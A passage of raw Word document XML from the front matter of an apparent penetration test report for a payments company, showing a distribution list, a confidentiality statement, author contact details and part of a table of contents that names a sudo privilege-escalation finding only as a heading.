            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>N. Yusupov, Cassandra Pay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="41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15BA6CE7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Reviews severity wording; PSD2/PCI-DSS implications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="4BA07559" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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6113180" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Internal Audit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CA4E5AD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>T. Kim, Cassandra Pay</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7D0BE015" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Maintains the Risk Register entry from §7.4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="626D7FB0" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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65C2AA93" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>External Auditor</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816C209" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Kreston Almaty (assigned partner)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="41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1C1EBE0B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Receives the report under NDA after CISO clearance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DC87F05" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBDB4DD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc229906563"/>
      <w:r>
        <w:t>Classification statement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="1BD05828" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This document contains technical and business-sensitive information about Cassandra Pay's information systems. Classification is CONFIDENTIAL — TLP:AMBER. Recipients may share the document with members of their organisation who have a need-to-know, but may not share it outside the organisation without written consent from the CISO. Reproduction in any form requires written authorisation. Disposal upon end of retention period (24 months from publication date) must follow Cassandra Pay's document destruction standard CP-RECORDS-04.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D2B027" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BC95CC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc229906564"/>
      <w:r>
        <w:t>Author contact</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="68CB6D7A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Triton Security Labs — Engagement Lead: Dmytro Bilozor (dmytro@triton-seclabs.io).  Engagement reference: TSL-2026-CP-014.  Office hours: 09:00–18:00 UTC+3, Mon–Fri.  Out-of-hours escalation via the firm's 24/7 line documented in the master MSA, Appendix C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F33CE44" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="617CE496" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc229906565"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="0F5A3F30" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Table of Contents"/>
        <w:id w:val="1848286388"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="1436CF1C" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText>TOC \h \o "1-3" \t "Heading1,1,Heading2,2,Heading3,3"</w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc229906560" w:history="1">
            <w:r w:rsidR="00C23662" w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Document Metadata</w:t>
            </w:r>
            <w:r w:rsidR="00C23662">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C23662">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C23662">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906560 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C23662">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C23662">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C23662">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00C23662">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15B42144" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906561" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Version history</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906561 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A6CFB1B" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906562" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Distribution list</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906562 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01EA06A4" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906563" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Classification statement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906563 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A0D6E2A" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906564" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Author contact</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906564 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4047F7A9" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906565" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Table of Contents</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906565 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23F4D3EC" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906566" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Executive Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906566 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0272BE82" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906567" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Top-3 business risks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906567 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0703366E" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906568" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Engagement Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906568 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="214BCC18" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906569" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1  Scope and Boundaries</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906569 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73E16CAE" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906570" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2  Rules of Engagement summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906570 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A13341B" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906571" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3  Methodology — PTES Phase Mapping</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906571 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DC2A648" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906572" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. Technical Findings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906572 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F71F404" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906573" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding F1: Over-permissive sudo rule grants unrestricted privilege escalation via awk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906573 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01AB31D2" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906574" w:history="1">
            <w:r w:rsidRPr="008170EF">
